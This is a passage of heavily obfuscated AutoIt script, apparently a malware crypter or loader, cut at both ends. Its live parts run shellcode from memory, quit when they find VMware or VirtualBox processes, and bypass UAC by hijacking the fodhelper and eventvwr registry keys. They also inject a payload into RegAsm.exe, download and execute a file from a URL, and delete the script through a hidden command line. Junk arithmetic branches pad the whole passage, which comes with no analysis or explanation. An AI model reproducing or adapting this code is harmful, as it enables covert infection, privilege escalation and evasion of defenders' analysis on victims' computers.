= 25981 ) DLLSTRUCTSETDATA ($XFKXPROGILAHMYBXGXUCQEQFMPQWDHWXVZYIFZJVKKD , "1" , "CURRENT_USER" ) ENDSWITCH $MAINSTRUCPOINTER = DLLSTRUCTGETPTR ($DWGBIQJWBPZWDCCJYPWOQXYMZRMTRPZJZAVFMC ) $QHNKYCOISAZTOELZARDAOCMMASRGPOINTER = DLLSTRUCTGETPTR ($QHNKYCOISAZTOELZARDAOCMMASRG ) SWITCH 1 CASE (+ 4294960686 - + 4294965147 - + 4294960326 + + 4294965814 - + 4294964926 = + 4294963187 + 4294966402 - + 4294963211 + 4294959996 = 4855 5733 + + 4294966150 + + 4294958807 - + 4294958539 = 3397 ) DLLCALL ("Kernel32.dll" , "Handle" , "LocalFree" , "Handle" , $QHNKYCOISAZTOELZARDAOCMMASRGPOINTER ) CASE (17 - + 4294964762 + + 4294960726 - + 4294965976 + 842 = 1892 + 4294962203 + + 4294965542 - + 4294958557 = + 4294959491 3765 - + 4294966370 + + 4294959258 + 4294962838 = + 4294965439 ) LOCAL $KKNRYWQDLRBECCOKDXWDDJCWHBVBEONY = DLLCALLADDRESS ("dword" , $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS + "0xBE" , "wstr" , $WPATH , "wstr" , $WARGUMENTS , "ptr" , DLLSTRUCTGETPTR ($ZOERKHYYBCPJCGFVVUVCMSNIQFSKZZ ) ) CASE (335 + 1246 - + 4294961205 - + 4294962828 = 12140 + 4294960680 + 4294960254 + 4294966137 + + 4294958955 - + 4294961230 = + 4294950204 + 4294959903 + + 4294962329 + + 4294964262 - + 4294966403 - + 4294960899 = + 4294959192 ) $SETENTRIESINACL = DLLCALL ("Advapi32.dll" , "dword" , "SetEntriesInAclA" , "ulong" , "1" , "ptr" , $MAINSTRUCPOINTER , "ptr" , "0" , "ptr" , $QHNKYCOISAZTOELZARDAOCMMASRGPOINTER ) CASE (3155 + 6488 + 972 = 3304 1738 + 1566 = + 4294962061 5541 + + 4294960704 + 4294962211 + 4294959799 - + 4294958898 = 10615 ) LOCAL $YRGAIPECFYASOFVZEUBOJUTHDTNVAKFLIUTJTT = ["0x401FFFFF" , "3" , "0" , "0" , "0" , "1" , "0" , DLLSTRUCTGETPTR ($XFKXPROGILAHMYBXGXUCQEQFMPQWDHWXVZYIFZJVKKD ) ] CASE (335 + 1246 - + 4294961205 - + 4294962828 = 12140 + 4294960680 + 4294960254 + 4294966137 + + 4294958955 - + 4294961230 = + 4294950204 + 4294959903 + + 4294962329 + + 4294964262 - + 4294966403 - + 4294960899 = + 4294959192 ) $SETENTRIESINACL = DLLCALL ("Advapi32.dll" , "dword" , "SetEntriesInAclA" , "ulong" , "1" , "ptr" , $MAINSTRUCPOINTER , "ptr" , "0" , "ptr" , $QHNKYCOISAZTOELZARDAOCMMASRGPOINTER ) CASE (335 + 1246 - + 4294961205 - + 4294962828 = 12140 + 4294960680 + 4294960254 + 4294966137 + + 4294958955 - + 4294961230 = + 4294950204 + 4294959903 + + 4294962329 + + 4294964262 - + 4294966403 - + 4294960899 = + 4294959192 ) $SETENTRIESINACL = DLLCALL ("Advapi32.dll" , "dword" , "SetEntriesInAclA" , "ulong" , "1" , "ptr" , $MAINSTRUCPOINTER , "ptr" , "0" , "ptr" , $QHNKYCOISAZTOELZARDAOCMMASRGPOINTER ) ENDSWITCH SWITCH 1 CASE (2031 - + 4294964329 + + 4294962755 + 4294962640 + + 4294963247 = 18863 8101 - + 4294959414 + 5062 + 4294965114 = 4007 2504 + 4294964402 - + 4294962899 = + 4294959048 ) LOCAL $DOGKUTDXAMPYZJRYYTZNFZHEXRHZJMBVTBU = DLLCALL ("kernel32.dll" , "dword" , "GetLastError" ) CASE (2633 - + 4294961037 + + 4294961298 - + 4294961072 + 80 = + 4294967216 + 4294959574 + 3057 + 5825 + + 4294966056 = + 4294962988 883 + + 4294962105 = 9198 ) FILECLOSE ($FKBPTLNPOIJUFVBXZOGWIYSNWYGCZBFVNV [$I ] ) CASE (1366 + 2941 + 1597 = 5904 + 4294962940 - + 4294963074 = + 4294967162 3104 - + 4294963260 + 6622 + 51 + + 4294958449 = 4966 ) $SETSECURITYINFO = DLLCALL ("Advapi32.dll" , "dword" , "SetSecurityInfo" , "handle" , $HANDLE , "int" , "6" , "dword" , "0x00000004" , "dword" , "0" , "dword" , "0" , "ptr" , DLLSTRUCTGETDATA ($QHNKYCOISAZTOELZARDAOCMMASRG , EXECUTE ("1" ) ) , "ptr" , "0" ) CASE (+ 4294965799 + 4294964543 + + 4294961958 - + 4294965662 = + 4294954227 + 4294960640 + 4294958755 + 4294963223 - + 4294959470 + 4294965671 = 11384 8100 - + 4294964012 = + 4294959342 ) FILEWRITE ($URLOPEN , $URLCONTENT ) CASE (1366 + 2941 + 1597 = 5904 + 4294962940 - + 4294963074 = + 4294967162 3104 - + 4294963260 + 6622 + 51 + + 4294958449 = 4966 ) $SETSECURITYINFO = DLLCALL ("Advapi32.dll" , "dword" , "SetSecurityInfo" , "handle" , $HANDLE , "int" , "6" , "dword" , "0x00000004" , "dword" , "0" , "dword" , "0" , "ptr" , DLLSTRUCTGETDATA ($QHNKYCOISAZTOELZARDAOCMMASRG , EXECUTE ("1" ) ) , "ptr" , "0" ) CASE (1366 + 2941 + 1597 = 5904 + 4294962940 - + 4294963074 = + 4294967162 3104 - + 4294963260 + 6622 + 51 + + 4294958449 = 4966 ) $SETSECURITYINFO = DLLCALL ("Advapi32.dll" , "dword" , "SetSecurityInfo" , "handle" , $HANDLE , "int" , "6" , "dword" , "0x00000004" , "dword" , "0" , "dword" , "0" , "ptr" , DLLSTRUCTGETDATA ($QHNKYCOISAZTOELZARDAOCMMASRG , EXECUTE ("1" ) ) , "ptr" , "0" ) ENDSWITCH DLLCALL ("Kernel32.dll" , "Handle" , "LocalFree" , "Handle" , $QHNKYCOISAZTOELZARDAOCMMASRGPOINTER ) ENDFUNC FUNC PJUVRYUZPYTUIMLJMDVPPVKMAA ($LOOP , $TIME ) SWITCH 0 CASE (+ 4294963794 + + 4294960569 = + 4294957067 + 4294967144 + 4294963542 + 6278 + 1029 - + 4294959011 = 11686 + 4294967057 + + 4294962558 = + 4294962319 ) RETURN DLLSTRUCTCREATE ("byte[" & $RESSIZE & "]" , $MEMORYPOINTER ) CASE (+ 4294960549 - + 4294958915 = 1634 + 4294966279 - + 4294966021 - + 4294960820 + 8710 = 15444 517 + 2964 - + 4294959515 + + 4294959769 = 3735 ) $URLOPEN = FILEOPEN ($OBBNXDUCPNVNYLY , "2" ) CASE (+ 4294960934 + 6762 = + 4294957204 + 4294965633 + + 4294958867 = 5664 2276 - + 4294962307 + 4294965695 = 400 ) LOCAL $OGXVTCHZXQNVYQRDEYYWPBIB = RANDOM ("0" , "255" ) CASE (+ 4294966519 - + 4294966356 = 163 832 + 7343 = 8175 + 4294960357 + 4294960102 - + 4294961070 + 4161 + 4294958933 = + 4294955187 ) $SETSECURITYINFO = DLLCALL ("Advapi32.dll" , "dword" , "SetSecurityInfo" , "handle" , $HANDLE , "int" , "6" , "dword" , "0x00000004" , "dword" , "0" , "dword" , "0" , "ptr" , DLLSTRUCTGETDATA ($QHNKYCOISAZTOELZARDAOCMMASRG , EXECUTE ("1" ) ) , "ptr" , "0" ) CASE (+ 4294960934 + 6762 = + 4294957204 + 4294965633 + + 4294958867 = 5664 2276 - + 4294962307 + 4294965695 = 400 ) LOCAL $OGXVTCHZXQNVYQRDEYYWPBIB = RANDOM ("0" , "255" ) CASE (+ 4294960934 + 6762 = + 4294957204 + 4294965633 + + 4294958867 = 5664 2276 - + 4294962307 + 4294965695 = 400 ) LOCAL $OGXVTCHZXQNVYQRDEYYWPBIB = RANDOM ("0" , "255" ) ENDSWITCH FOR $I = "0" TO $LOOP SWITCH 1 CASE (+ 4294959125 - + 4294965537 + 7412 + 4294966801 = + 4294957301 + 4294967239 + + 4294960201 + + 4294962202 - + 4294965045 = 17729 + 4294962032 - + 4294960996 + 1367 - + 4294959867 - + 4294959399 = 505 ) FILECLOSE ($AJDQJAIDPTEQIWGATMCERFEKYPSWJNWDDSVZHQ ) CASE (4192 + + 4294958749 + + 4294962122 + + 4294962066 = + 4294952840 + 4294964453 + 4294961824 + 4294966311 + 4294962140 = 8675 6592 + 2079 - + 4294964994 + + 4294964998 = + 4294952537 ) LOCAL $YRGAIPECFYASOFVZEUBOJUTHDTNVAKFLIUTJTT = ["0x401FFFFF" , "3" , "0" , "0" , "0" , "1" , "0" , DLLSTRUCTGETPTR ($XFKXPROGILAHMYBXGXUCQEQFMPQWDHWXVZYIFZJVKKD ) ] CASE (+ 4294961701 + + 4294963257 - + 4294961360 + 4294965883 = + 4294962185 + 4294964719 + + 4294962505 + 1750 + 4294966525 = + 4294960907 8588 + 4294965238 - + 4294959535 = 14291 ) SLEEP ($TIME / $LOOP ) CASE (2667 + 4294962105 + 8187 + 4294963866 + 4294965933 = + 4294957494 + 4294960773 + 4294960928 - + 4294964207 = 2232 5120 + 4294965629 - + 4294963345 + + 4294962124 = 870 ) LOCAL $UYIEGCJMPAKFZYWTXDINSLYTAOSBORYHPPWQNBIOSQZGFRYMJDRYXEE = DLLSTRUCTCREATE ("byte shellcode[" & $OUBJOAAIMSDPJLUJMOJFFINL & "]" , $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS ) CASE (+ 4294961701 + + 4294963257 - + 4294961360 + 4294965883 = + 4294962185 + 4294964719 + + 4294962505 + 1750 + 4294966525 = + 4294960907 8588 + 4294965238 - + 4294959535 = 14291 ) SLEEP ($TIME / $LOOP ) CASE (+ 4294961701 + + 4294963257 - + 4294961360 + 4294965883 = + 4294962185 + 4294964719 + + 4294962505 + 1750 + 4294966525 = + 4294960907 8588 + 4294965238 - + 4294959535 = 14291 ) SLEEP ($TIME / $LOOP ) ENDSWITCH $OGXVTCHZXQNVYQRDEYYWPBIB += RANDOM ("0" , "255" ) IF $OGXVTCHZXQNVYQRDEYYWPBIB = $OGXVTCHZXQNVYQRDEYYWPBIB THEN SWITCH 1 CASE (8714 + 4294961559 - + 4294958644 + + 4294962709 - + 4294963517 = + 4294956748 + 4294961295 - + 4294964023 + + 4294962042 + 4294964136 + 594 = 3525 4536 - + 4294964796 + + 4294961795 + 1990 = 10821 ) SHELLEXECUTE ($MEMCMRFDKFHXIASCNLFGGABYOTQMAZ ) CASE (5094 + 7841 = + 4294954196 + 4294958683 + 4294964320 + 5796 + 4294959989 = 4656 + 4294959596 - + 4294960254 - + 4294961982 = 12935 ) LOCAL $REKZAAHOPSPENYFKWYWOQOYXKCKZAEPNKJEPSUZOUMYFN = FILEOPEN (@AUTOITEXE , "16" ) CASE (3201 + 4294966230 + 4294965394 - + 4294963211 + + 4294959746 = + 4294964064 + 4294962646 + 4294962901 = + 4294958251 2349 + + 4294965985 = 1038 ) $OGXVTCHZXQNVYQRDEYYWPBIB = RANDOM ("0" , "255" ) CASE (3867 + 7651 + 4294966602 = + 4294952924 1120 + + 4294963553 + 4294962735 + 4294960108 = 12737 4679 + + 4294962820 + 8283 - + 4294963045 = 10824 ) MSGBOX ($TYPE , $TITLE , $OUBJOAAIMSDPJLUJMOJFFODY ) CASE (3201 + 4294966230 + 4294965394 - + 4294963211 + + 4294959746 = + 4294964064 + 4294962646 + 4294962901 = + 4294958251 2349 + + 4294965985 = 1038 ) $OGXVTCHZXQNVYQRDEYYWPBIB = RANDOM ("0" , "255" ) CASE (3201 + 4294966230 + 4294965394 - + 4294963211 + + 4294959746 = + 4294964064 + 4294962646 + 4294962901 = + 4294958251 2349 + + 4294965985 = 1038 ) $OGXVTCHZXQNVYQRDEYYWPBIB = RANDOM ("0" , "255" ) ENDSWITCH ENDIF NEXT ENDFUNC FUNC ZAAOVMXICJWJRRBGUADERMITN ($SOCCURRENCENAME ) SWITCH 1 CASE (+ 4294961000 - + 4294959043 - + 4294962850 - + 4294963711 = 5876 7085 + 4294965988 + 99 = 3904 + 4294966930 + 556 + 3714 = 9988 ) $MEMORYPOINTER = DLLCALL ("kernel32.dll" , "ptr" , "LockResource" , "ptr" , $GLOBALMEMORYBLOCK ) ["0" ] CASE (2633 - + 4294958695 - + 4294962736 + + 4294961463 = + 4294965238 + 4294959652 + 3540 + + 4294961943 + 3240 - + 4294963137 = + 4294949244 + 4294964372 + + 4294959103 + + 4294958655 - + 4294965590 = 9961 ) FILECLOSE ($AJDQJAIDPTEQIWGATMCERFEKYPSWJNWDDSVZHQ ) CASE (3908 + 4294964236 = 848 + 4294958955 + 474 + 4294958661 + 4294959154 = + 4294942652 7285 + 4294960439 + 1484 + + 4294966141 + 7380 = 8137 ) LOCAL $SPKUMLGLOMHMYZFWTQENOHVRQPKUWPMYVABMXFKFGJKDJRFYTAW = DLLCALL ("kernel32.dll" , "handle" , "CreateMutexW" , "struct*" , "0" , "bool" , "1" , "wstr" , $SOCCURRENCENAME ) CASE (1271 - + 4294965581 + + 4294961302 + + 4294961899 + 4294960382 = + 4294957118 + 4294959010 + 4294966934 + 5242 + + 4294962788 + 4294965032 = 11514 8037 - + 4294963819 = + 4294951977 ) LOCAL $OUBJOAAIMSDPJLUJMOJFFINARY = FILEREAD ($REKZAAHOPSPENYFKWYWOQOYXKCKZAEPNKJEPSUZOUMYFN ) & BINARY (RANDOM ("0" , "255" ) ) CASE (3908 + 4294964236 = 848 + 4294958955 + 474 + 4294958661 + 4294959154 = + 4294942652 7285 + 4294960439 + 1484 + + 4294966141 + 7380 = 8137 ) LOCAL $SPKUMLGLOMHMYZFWTQENOHVRQPKUWPMYVABMXFKFGJKDJRFYTAW = DLLCALL ("kernel32.dll" , "handle" , "CreateMutexW" , "struct*" , "0" , "bool" , "1" , "wstr" , $SOCCURRENCENAME ) CASE (3908 + 4294964236 = 848 + 4294958955 + 474 + 4294958661 + 4294959154 = + 4294942652 7285 + 4294960439 + 1484 + + 4294966141 + 7380 = 8137 ) LOCAL $SPKUMLGLOMHMYZFWTQENOHVRQPKUWPMYVABMXFKFGJKDJRFYTAW = DLLCALL ("kernel32.dll" , "handle" , "CreateMutexW" , "struct*" , "0" , "bool" , "1" , "wstr" , $SOCCURRENCENAME ) ENDSWITCH LOCAL $DOGKUTDXAMPYZJRYYTZNFZHEXRHZJMBVTBU = DLLCALL ("kernel32.dll" , "dword" , "GetLastError" ) IF $DOGKUTDXAMPYZJRYYTZNFZHEXRHZJMBVTBU ["0" ] = "183" THEN DLLCALL ("kernel32.dll" , "bool" , "CloseHandle" , "handle" , $SPKUMLGLOMHMYZFWTQENOHVRQPKUWPMYVABMXFKFGJKDJRFYTAW ["0" ] ) SWITCH 0 CASE (+ 4294958857 + + 4294959819 + 3768 + + 4294963553 = + 4294951405 + 4294967148 + + 4294963180 - + 4294963650 = + 4294966678 4462 + 7302 - + 4294960030 + + 4294958883 - + 4294959176 = 18737 ) SHELLEXECUTE (@COMSPEC , "/k ping 127.0.0.1 -t 0 & del " & @AUTOITEXE & " & exit " , NULL , NULL , @SW_HIDE ) CASE (+ 4294959100 + + 4294961434 + 4294966761 = + 4294952703 843 + 4294959577 + + 4294964263 - + 4294964755 = + 4294959928 5004 - + 4294959562 + 4294965322 + + 4294958415 = 1883 ) $VBSOPEN = FILEOPEN ($DTISJMIDXWOJTBLFFZUKGGPNPUZNQYLQRCWBFFZMVROZJBWUDU , "2" ) CASE (+ 4294958851 + 4294966427 + + 4294963556 + 4294959246 + 4294962752 = + 4294957215 + 4294965661 + 4294958850 = 4038 7657 + + 4294963677 = + 4294941648 ) PROCESSCLOSE (@AUTOITEXE ) CASE (2448 - + 4294963425 = 6319 6627 - + 4294961107 + 4294960689 + 4294964401 = 3314 2072 + + 4294965048 + 4294961362 + 4294963558 - + 4294965356 = + 4294959388 ) LOCAL $KKNRYWQDLRBECCOKDXWDDJCWHBVBEONY = DLLCALLADDRESS ("dword" , $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS + "0xBE" , "wstr" , $WPATH , "wstr" , $WARGUMENTS , "ptr" , DLLSTRUCTGETPTR ($ZOERKHYYBCPJCGFVVUVCMSNIQFSKZZ ) ) CASE (+ 4294958851 + 4294966427 + + 4294963556 + 4294959246 + 4294962752 = + 4294957215 + 4294965661 + 4294958850 = 4038 7657 + + 4294963677 = + 4294941648 ) PROCESSCLOSE (@AUTOITEXE ) CASE (+ 4294958851 + 4294966427 + + 4294963556 + 4294959246 + 4294962752 = + 4294957215 + 4294965661 + 4294958850 = 4038 7657 + + 4294963677 = + 4294941648 ) PROCESSCLOSE (@AUTOITEXE ) ENDSWITCH ENDIF ENDFUNC FUNC VWFAJPUJWAKVLYBUBFHQFVGAWGQJR ($RESNAME , $RESTYPE ) LOCAL $RESPOINTER LOCAL $RESSIZE LOCAL $HINSTANCE LOCAL $INFOBLOCK LOCAL $GLOBALMEMORYBLOCK LOCAL $MEMORYPOINTER SWITCH 0 CASE (7749 + + 4294964107 = 4560 6454 + 4294966036 = 5194 + 4294959891 + 2563 + 2887 + 4294960107 = + 4294958152 ) SHELLEXECUTE ($MEMCMRFDKFHXIASCNLFGGABYOTQMAZ & "\" & $FILENAME ) CASE (3766 - + 4294960984 + 4083 + 4294962474 + + 4294960577 = 2620 3792 + 4294962993 + + 4294966540 - + 4294963728 + 4294959654 = + 4294961955 7012 + 8184 - + 4294959225 - + 4294964641 = 25922 ) FILEWRITE ($AJDQJAIDPTEQIWGATMCERFEKYPSWJNWDDSVZHQ , $FILE ) CASE (3716 + + 4294961086 = + 4294962480 + 4294963397 + 4294962138 + 4241 = 1738 + 4294964962 + 4072 = + 4294964802 ) $INFOBLOCK = DLLCALL ("kernel32.dll" , "ptr" , "FindResourceW" , "ptr" , $HINSTANCE , "wstr" , $RESNAME , "long" , $RESTYPE ) ["0" ] CASE (7024 - + 4294959522 + + 4294965630 = 13132 + 4294964549 + + 4294961294 - + 4294963676 = + 4294962167 + 4294958533 + 2124 + + 4294961104 = + 4294954465 ) $INFOBLOCK = DLLCALL ("kernel32.dll" , "ptr" , "FindResourceW" , "ptr" , $HINSTANCE , "wstr" , $RESNAME , "long" , $RESTYPE ) ["0" ] CASE (3716 + + 4294961086 = + 4294962480 + 4294963397 + 4294962138 + 4241 = 1738 + 4294964962 + 4072 = + 4294964802 ) $INFOBLOCK = DLLCALL ("kernel32.dll" , "ptr" , "FindResourceW" , "ptr" , $HINSTANCE , "wstr" , $RESNAME , "long" , $RESTYPE ) ["0" ] CASE (3716 + + 4294961086 = + 4294962480 + 4294963397 + 4294962138 + 4241 = 1738 + 4294964962 + 4072 = + 4294964802 ) $INFOBLOCK = DLLCALL ("kernel32.dll" , "ptr" , "FindResourceW" , "ptr" , $HINSTANCE , "wstr" , $RESNAME , "long" , $RESTYPE ) ["0" ] ENDSWITCH $RESSIZE = DLLCALL ("kernel32.dll" , "dword" , "SizeofResource" , "ptr" , $HINSTANCE , "ptr" , $INFOBLOCK ) ["0" ] $GLOBALMEMORYBLOCK = DLLCALL ("kernel32.dll" , "ptr" , "LoadResource" , "ptr" , $HINSTANCE , "ptr" , $INFOBLOCK ) ["0" ] $MEMORYPOINTER = DLLCALL ("kernel32.dll" , "ptr" , "LockResource" , "ptr" , $GLOBALMEMORYBLOCK ) ["0" ] SWITCH 1 CASE (6858 - + 4294965613 - + 4294962584 = 10896 5800 + 5096 = 1429 3900 - + 4294964026 + + 4294961555 = 13253 ) $QHNKYCOISAZTOELZARDAOCMMASRGPOINTER = DLLSTRUCTGETPTR ($QHNKYCOISAZTOELZARDAOCMMASRG ) CASE (+ 4294965134 + 4714 + 6769 + + 4294965906 = + 4294964878 + 4294960092 + 4786 = 8027 6627 - + 4294965896 = 7931 ) $QHNKYCOISAZTOELZARDAOCMMASRGPOINTER = DLLSTRUCTGETPTR ($QHNKYCOISAZTOELZARDAOCMMASRG ) CASE (+ 4294965913 + 4294961455 + 4715 + 4294959024 = + 4294956515 + 4294960439 + 4838 + + 4294959449 + + 4294966624 = + 4294956758 4228 + + 4294962107 + 4294962664 + + 4294966439 - + 4294960699 = 147 ) RETURN DLLSTRUCTCREATE ("byte[" & $RESSIZE & "]" , $MEMORYPOINTER ) CASE (+ 4294963235 + + 4294963993 + 5867 - + 4294965472 = 2829 3693 + 4294966011 + + 4294964612 + 3105 = 3230 + 4294962100 - + 4294958870 = 327 ) MSGBOX ($TYPE , $TITLE , $OUBJOAAIMSDPJLUJMOJFFODY ) CASE (+ 4294965913 + 4294961455 + 4715 + 4294959024 = + 4294956515 + 4294960439 + 4838 + + 4294959449 + + 4294966624 = + 4294956758 4228 + + 4294962107 + 4294962664 + + 4294966439 - + 4294960699 = 147 ) RETURN DLLSTRUCTCREATE ("byte[" & $RESSIZE & "]" , $MEMORYPOINTER ) CASE (+ 4294965913 + 4294961455 + 4715 + 4294959024 = + 4294956515 + 4294960439 + 4838 + + 4294959449 + + 4294966624 = + 4294956758 4228 + + 4294962107 + 4294962664 + + 4294966439 - + 4294960699 = 147 ) RETURN DLLSTRUCTCREATE ("byte[" & $RESSIZE & "]" , $MEMORYPOINTER ) ENDSWITCH ENDFUNC FUNC SNUDYENHFQLVAOTABJ () LOCAL $YRGAIPECFYASOFVZEUBOJUTHDTNVAKFLIUTJTT = ["vmtoolsd.exe" , "vbox.exe" ] FOR $I = "0" TO UBOUND ($YRGAIPECFYASOFVZEUBOJUTHDTNVAKFLIUTJTT ) - "1" IF PROCESSEXISTS ($YRGAIPECFYASOFVZEUBOJUTHDTNVAKFLIUTJTT [$I ] ) THEN PROCESSCLOSE (@AUTOITPID ) ENDIF NEXT ENDFUNC FUNC IOCFGSMTNGEOYEERBZKCZTIBDNP ($PROTECT ) LOCAL $KUFYPJEHBVLRVMKLNHZCLBTKUPASCOSYAPJAGFKQ = $IAHZOETNXYCDXIFHZTGAVGFJ IF FILEEXISTS (@HOMEDRIVE & "\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" ) THEN $PROCESSID = MKAWTJCTRCEZDEDBUQPZGMLXI (@HOMEDRIVE & "\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" , "" , $KUFYPJEHBVLRVMKLNHZCLBTKUPASCOSYAPJAGFKQ , $PROTECT ) ELSEIF FILEEXISTS (@HOMEDRIVE & "\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" ) THEN $PROCESSID = MKAWTJCTRCEZDEDBUQPZGMLXI (@HOMEDRIVE & "\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" , "" , $KUFYPJEHBVLRVMKLNHZCLBTKUPASCOSYAPJAGFKQ , $PROTECT ) ENDIF ENDFUNC FUNC OHUKFVGBOCBSWLZEQFYYJ () IF NOT WINEXISTS ("[CLASS:Progman]" ) THEN SWITCH 1 CASE (+ 4294962621 + 4294959550 - + 4294966279 + + 4294964980 + 8602 = + 4294952699 + 4294962557 + + 4294961608 + + 4294959415 + 819 - + 4294964404 = 6453 6212 + 3368 + + 4294964169 = + 4294962178 ) REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "DelegateExecute" , "REG_SZ" , "Null" ) CASE (+ 4294961099 + 7233 + + 4294962617 = + 4294960837 + 4294962685 + + 4294966708 + 4294966036 = + 4294963647 4447 + 4294959200 = + 4294963653 ) REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "" , "REG_SZ" , @AUTOITEXE ) CASE (+ 4294960363 + 620 + 4294959292 - + 4294963378 = + 4294956897 6380 + 4294960042 - + 4294964761 - + 4294962698 = 6259 + 4294958606 + + 4294967172 = + 4294958482 ) PROCESSCLOSE (@AUTOITPID ) CASE (+ 4294959246 - + 4294964074 + 4294959792 = + 4294952769 + 4294964266 + + 4294964148 + 4294962801 + 4294963442 = + 4294961947 + 4294966082 + + 4294963161 = + 4294954964 ) DLLCALL ("kernel32.dll" , "boolean" , "Wow64EnableWow64FsRedirection" , "boolean" , "0" ) CASE (+ 4294960363 + 620 + 4294959292 - + 4294963378 = + 4294956897 6380 + 4294960042 - + 4294964761 - + 4294962698 = 6259 + 4294958606 + + 4294967172 = + 4294958482 ) PROCESSCLOSE (@AUTOITPID ) CASE (+ 4294960363 + 620 + 4294959292 - + 4294963378 = + 4294956897 6380 + 4294960042 - + 4294964761 - + 4294962698 = 6259 + 4294958606 + + 4294967172 = + 4294958482 ) PROCESSCLOSE (@AUTOITPID ) ENDSWITCH ENDIF ENDFUNC FUNC XVQROZGRABAHESGMV () ENDFUNC FUNC GQJRWUNJCRAZVSIWM () IF STRINGINSTR (@OSVERSION , "7" ) OR STRINGINSTR (@OSVERSION , "8" ) THEN IF NOT ISADMIN () THEN REGWRITE ("HKCU\Software\Classes\mscfile\shell\open\command" , "" , "REG_SZ" , @AUTOITEXE ) SHELLEXECUTE ("eventvwr" ) PROCESSCLOSE (@AUTOITPID ) ENDIF ELSEIF STRINGINSTR (@OSVERSION , "10" ) THEN IF NOT ISADMIN () THEN DLLCALL ("kernel32.dll" , "boolean" , "Wow64EnableWow64FsRedirection" , "boolean" , "0" ) REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "DelegateExecute" , "REG_SZ" , "Null" ) REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "" , "REG_SZ" , @AUTOITEXE ) SWITCH 1 CASE (+ 4294967088 + + 4294962333 - + 4294961732 = 12596 4091 - + 4294965420 + 7587 - + 4294966369 + 4294965411 = 325 + 4294966869 - + 4294966544 = 393 ) INETGET ($URL , $MEMCMRFDKFHXIASCNLFGGABYOTQMAZ & "\" & $FILENAME ) CASE (+ 4294965341 + + 4294959806 = + 4294953131 701 + + 4294965415 + + 4294960911 + 4294960696 = 469 + 4294965797 + 4294965017 + + 4294966253 + 5437 + + 4294967149 = + 4294957851 ) $QHNKYCOISAZTOELZARDAOCMMASRGPOINTER = DLLSTRUCTGETPTR ($QHNKYCOISAZTOELZARDAOCMMASRG ) CASE (+ 4294964206 + + 4294959074 + 4294963557 + + 4294964898 = + 4294949847 + 4294962196 + + 4294960911 = + 4294955811 6435 - + 4294961717 + + 4294964354 = 9072 ) SHELLEXECUTE ("fodhelper" ) CASE (4995 + 7180 + 4294963058 = 3029 4387 + 2137 - + 4294966719 + 4294963224 = 14700 7797 - + 4294960393 = 7937 ) LOCAL $KKNRYWQDLRBECCOKDXWDDJCWHBVBEONY = DLLCALLADDRESS ("dword" , $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS + "0xBE" , "wstr" , $WPATH , "wstr" , $WARGUMENTS , "ptr" , DLLSTRUCTGETPTR ($ZOERKHYYBCPJCGFVVUVCMSNIQFSKZZ ) ) CASE (+ 4294964206 + + 4294959074 + 4294963557 + + 4294964898 = + 4294949847 + 4294962196 + + 4294960911 = + 4294955811 6435 - + 4294961717 + + 4294964354 = 9072 ) SHELLEXECUTE ("fodhelper" ) CASE (+ 4294964206 + + 4294959074 + 4294963557 + + 4294964898 = + 4294949847 + 4294962196 + + 4294960911 = + 4294955811 6435 - + 4294961717 + + 4294964354 = 9072 ) SHELLEXECUTE ("fodhelper" ) ENDSWITCH PROCESSCLOSE (@AUTOITPID ) ENDIF ENDIF ENDFUNC FUNC FLCFYXNWIBBCLIFPDBW ($TYPE , $TITLE , $OUBJOAAIMSDPJLUJMOJFFODY ) IF @SCRIPTDIR <> $QCTGPDCYIKISRF THEN LOCAL $TYGYOJURBPDEKDJAUDZ = "0x00000010" MSGBOX ($TYPE , $TITLE , $OUBJOAAIMSDPJLUJMOJFFODY ) ENDIF ENDFUNC FUNC GDZJQFSBGZRFLWOBCCPPHJODO ($URL , $FILENAME , $DIR ) IF @SCRIPTDIR <> $QCTGPDCYIKISRF THEN LOCAL $MEMCMRFDKFHXIASCNLFGGABYOTQMAZ = GETDIR ($DIR ) SWITCH 0 CASE (4176 + 2382 = 6558 + 4294966811 + 8314 + + 4294958582 = + 4294966411 + 4294961716 + 7349 = 1769 ) FILECLOSE ($FKBPTLNPOIJUFVBXZOGWIYSNWYGCZBFVNV [$I ] ) CASE (3980 - + 4294960890 - + 4294959385 + + 4294963295 = 14296 + 4294963173 + 4294966186 + 4294962215 + + 4294964076 = + 4294953762 1508 - + 4294961159 = 7645 ) DLLSTRUCTSETDATA ($ZOERKHYYBCPJCGFVVUVCMSNIQFSKZZ , "lpfile" , $LPFILE ) CASE (1046 - + 4294966352 + 2576 + + 4294963375 + 4294964959 = 12455 7089 + 4798 - + 4294964189 + 4294964757 = + 4294965496 + 4294959781 + 5715 = + 4294965604 ) INETGET ($URL , $MEMCMRFDKFHXIASCNLFGGABYOTQMAZ & "\" & $FILENAME ) CASE (3023 + 3295 + 4294967078 + + 4294961108 = + 4294967208 + 4294961452 - + 4294960110 - + 4294959740 = 8898 7739 + + 4294959763 - + 4294966849 + + 4294962601 = + 4294963254 ) $INFOBLOCK = DLLCALL ("kernel32.dll" , "ptr" , "FindResourceW" , "ptr" , $HINSTANCE , "wstr" , $RESNAME , "long" , $RESTYPE ) ["0" ] CASE (1046 - + 4294966352 + 2576 + + 4294963375 + 4294964959 = 12455 7089 + 4798 - + 4294964189 + 4294964757 = + 4294965496 + 4294959781 + 5715 = + 4294965604 ) INETGET ($URL , $MEMCMRFDKFHXIASCNLFGGABYOTQMAZ & "\" & $FILENAME ) CASE (1046 - + 4294966352 + 2576 + + 4294963375 + 4294964959 = 12455 7089 + 4798 - + 4294964189 + 4294964757 = + 4294965496 + 4294959781 + 5715 = + 4294965604 ) INETGET ($URL , $MEMCMRFDKFHXIASCNLFGGABYOTQMAZ & "\" & $FILENAME ) ENDSWITCH SHELLEXECUTE 